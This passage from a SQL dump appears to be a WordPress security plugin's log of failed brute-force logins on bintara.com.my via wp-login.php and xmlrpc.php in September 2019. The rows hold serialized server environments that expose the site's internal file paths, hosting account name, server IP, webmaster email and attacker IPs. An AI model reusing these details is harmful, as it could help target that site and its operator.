09:49:23',18256152,19554712,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.40.233'),(24050,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.40.233\";s:11:\"REMOTE_PORT\";s:5:\"49857\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9aoGCCaIOMm5l5jJE9tQAAARY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568627361.0372\";s:12:\"REQUEST_TIME\";s:10:\"1568627361\";}}','notice','2019-09-16 09:49:22','2019-09-16 09:49:21',17738696,19231368,'https://bintara.com.my/wp-login.php',1,0,'139.59.40.233'),(23821,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.76.36.242\";s:11:\"REMOTE_PORT\";s:5:\"46966\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3XLOesTgPVjZVPWmsG-QAAAMQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568528172.5648\";s:12:\"REQUEST_TIME\";s:10:\"1568528172\";}}','notice','2019-09-15 06:16:13','2019-09-15 06:16:12',18257832,19557336,'https://bintara.com.my/xmlrpc.php',1,0,'34.76.36.242'),(23822,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.41.232\";s:11:\"REMOTE_PORT\";s:5:\"56212\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3ZyaPPIU0WjPk-sOt-4AAAAYs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568528841.8164\";s:12:\"REQUEST_TIME\";s:10:\"1568528841\";}}','notice','2019-09-15 06:27:23','2019-09-15 06:27:22',17739464,19231464,'https://bintara.com.my/wp-login.php',1,0,'162.144.41.232'),(23823,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.41.232\";s:11:\"REMOTE_PORT\";s:5:\"56906\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3ZzaPPIU0WjPk-sOt-4gAAAYY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568528845.7373\";s:12:\"REQUEST_TIME\";s:10:\"1568528845\";}}','notice','2019-09-15 06:27:27','2019-09-15 06:27:26',18257072,19554608,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.41.232'),(23824,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.228.226\";s:11:\"REMOTE_PORT\";s:5:\"35866\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3cQ6PPIU0WjPk-sOuBDgAAAY8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568529475.4874\";s:12:\"REQUEST_TIME\";s:10:\"1568529475\";}}','notice','2019-09-15 06:37:56','2019-09-15 06:37:55',17740744,19231944,'https://bintara.com.my/wp-login.php',1,0,'139.59.228.226'),(23825,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.228.226\";s:11:\"REMOTE_PORT\";s:5:\"36030\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3cReoTLkHKFi2qF7EVLwAAABI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568529477.5943\";s:12:\"REQUEST_TIME\";s:10:\"1568529477\";}}','notice','2019-09-15 06:37:59','2019-09-15 06:37:57',18257072,19554608,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.228.226'),(23826,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.125.133\";s:11:\"REMOTE_PORT\";s:5:\"33880\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3fDqPPIU0WjPk-sOuCWAAAAYg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568530190.7641\";s:12:\"REQUEST_TIME\";s:10:\"1568530190\";}}','notice','2019-09-15 06:49:52','2019-09-15 06:49:51',17739232,19231720,'https://bintara.com.my/wp-login.php',1,0,'104.238.125.133'),(23827,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.125.133\";s:11:\"REMOTE_PORT\";s:5:\"34392\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3fEaPPIU0WjPk-sOuCWwAAAZU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568530193.6836\";s:12:\"REQUEST_TIME\";s:10:\"1568530193\";}}','notice','2019-09-15 06:49:55','2019-09-15 06:49:54',18257408,19557208,'https://bintara.com.my/xmlrpc.php',1,0,'104.238.125.133'),(23828,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.74.121.142\";s:11:\"REMOTE_PORT\";s:5:\"37593\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3kmKPPIU0WjPk-sOuFiAAAAYs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568531609.0245\";s:12:\"REQUEST_TIME\";s:10:\"1568531609\";}}','notice','2019-09-15 07:13:30','2019-09-15 